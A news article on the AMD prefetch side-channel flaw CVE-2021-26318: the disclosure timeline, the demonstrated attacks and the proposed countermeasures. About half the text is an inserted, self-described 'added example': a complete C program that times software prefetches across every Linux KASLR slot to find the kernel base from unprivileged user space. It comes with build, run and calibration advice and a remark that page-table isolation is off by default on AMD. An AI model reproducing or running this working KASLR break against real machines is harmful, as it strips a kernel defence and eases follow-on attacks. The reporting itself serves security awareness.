Researchers from Graz University of Technology and the CISPA Helmholtz Center for Information Security have discovered a new side-channel attack on AMD CPUs which, according to the researchers, affects all AMD processors. Side-channel attacks of this kind typically allow a malicious application installed on the targeted system to exploit CPU flaws in order to obtain potentially sensitive information from memory belonging to other processes, such as passwords and encryption keys.
The newly presented research shows that, while many of the side-channel attacks revealed in recent years have targeted Intel processors, systems powered by AMD processors are not immune.
According to the researchers' announcement: "We observe timing and power variations of the prefetch instruction from unprivileged user space. In contrast to previous work on Intel prefetch attacks, we demonstrate that the AMD prefetch instruction leaks even more information."
The researchers reported their initial findings to AMD on June 16th, 2020, and the remaining parts on November 24th, 2020. On February 16th, 2021, AMD acknowledged the findings and provided feedback.
The researchers demonstrated several attack cases, including a microarchitectural break of the exploit mitigation technique KASLR (kernel address-space layout randomization) on AMD CPUs. They were also able to establish a covert channel and to monitor kernel activity (for example, detecting whether audio is being played over Bluetooth). The team further demonstrated how simple Spectre gadgets in the Linux kernel can be used to exfiltrate data from kernel memory.
The research paper also proposes countermeasures and mitigation strategies for the presented attacks, such as:
- Page Table Isolation (KPTI)
- Prefetch configuration MSRs
- Restricting access
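As an added example (this is not code from the paper, from AMD, or from this article), the following C program shows the unprivileged user-space measurement primitive the quoted announcement refers to, and applies it to the KASLR break mentioned above: it times a software prefetch of every candidate kernel base address with rdtscp and reports the slot whose timing stands out. Assumptions beyond what the article states: the Linux x86-64 KASLR window (1 GiB from 0xffffffff80000000, 2 MiB alignment, 512 slots), the 1000-sample repetition count, and all function names.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#if defined(__x86_64__) || defined(__i386__)
#include <x86intrin.h>
#endif

/* Assumption: Linux x86-64 KASLR places the kernel text somewhere in the
 * 1 GiB window starting at 0xffffffff80000000, aligned to 2 MiB, which
 * gives 512 candidate base addresses to probe. */
#define KTEXT_BASE   0xffffffff80000000ULL
#define KTEXT_WINDOW 0x40000000ULL
#define KTEXT_ALIGN  0x200000ULL
#define KTEXT_SLOTS  (KTEXT_WINDOW / KTEXT_ALIGN)

/* Timestamp read; rdtscp waits for earlier instructions to complete.
 * Non-x86 builds fall back to a nanosecond clock so the harness still
 * compiles, but that clock is far too coarse for a real measurement. */
static inline uint64_t now_ticks(void) {
#if defined(__x86_64__) || defined(__i386__)
    unsigned int aux;
    return __rdtscp(&aux);
#else
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint64_t)ts.tv_sec * 1000000000ULL + (uint64_t)ts.tv_nsec;
#endif
}

static inline void fence(void) {
#if defined(__x86_64__) || defined(__i386__)
    _mm_mfence();
    _mm_lfence();
#else
    __sync_synchronize();
#endif
}

/* Time a single software prefetch of addr. Prefetch hints never raise a
 * fault, so kernel addresses can be probed from unprivileged user space;
 * the fences confine the measured window to the prefetch itself. */
static uint64_t time_prefetch(const void *addr) {
    fence();
    uint64_t t0 = now_ticks();
    __builtin_prefetch(addr, 0, 3);   /* prefetcht0 on x86 */
    fence();
    uint64_t t1 = now_ticks();
    return t1 - t0;
}

/* Minimum over reps samples: interrupts and other noise only ever make a
 * sample slower, so the minimum is the cleanest estimate. */
static uint64_t min_prefetch_time(const void *addr, int reps) {
    uint64_t best = UINT64_MAX;
    for (int i = 0; i < reps; i++) {
        uint64_t t = time_prefetch(addr);
        if (t < best) best = t;
    }
    return best;
}

/* Index of the smallest timing (first one on ties; 0 for an empty array). */
static size_t argmin_u64(const uint64_t *t, size_t n) {
    size_t best = 0;
    for (size_t i = 1; i < n; i++)
        if (t[i] < t[best]) best = i;
    return best;
}

/* Measure every KASLR slot; returns how many slots were written to out. */
static size_t sweep_kaslr_slots(uint64_t *out, size_t cap, int reps) {
    size_t n = KTEXT_SLOTS < cap ? (size_t)KTEXT_SLOTS : cap;
    for (size_t i = 0; i < n; i++) {
        uintptr_t va = (uintptr_t)(KTEXT_BASE + i * KTEXT_ALIGN);
        out[i] = min_prefetch_time((const void *)va, reps);
    }
    return n;
}

int main(void) {
    static uint64_t t[KTEXT_SLOTS];
    size_t n = sweep_kaslr_slots(t, KTEXT_SLOTS, 1000);
    size_t i = argmin_u64(t, n);
    printf("fastest slot %zu -> candidate kernel base 0x%llx (%llu ticks)\n",
           i, (unsigned long long)(KTEXT_BASE + i * KTEXT_ALIGN),
           (unsigned long long)t[i]);
    return 0;
}
```

Build with `gcc -O2` and run as an ordinary user. The direction of the timing difference between the mapped slot and the unmapped ones is microarchitecture-specific, so calibrate on the target first (for instance by dumping all 512 timings) rather than trusting the minimum blindly; the paper also uses power measurements, which this example does not reproduce. With Page Table Isolation enabled, almost none of the kernel is mapped while user code runs and the sweep shows no structure, which is why it heads the countermeasure list above. Note that Linux leaves PTI disabled on AMD by default and only enables it there when booted with the `pti=on` parameter.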
The flaws are collectively tracked as CVE-2021-26318, with AMD classifying them as medium severity and confirming that all of its processors are affected. However, the chipmaker does not recommend any mitigations because the researchers' attack scenarios do not directly leak data across address space boundaries.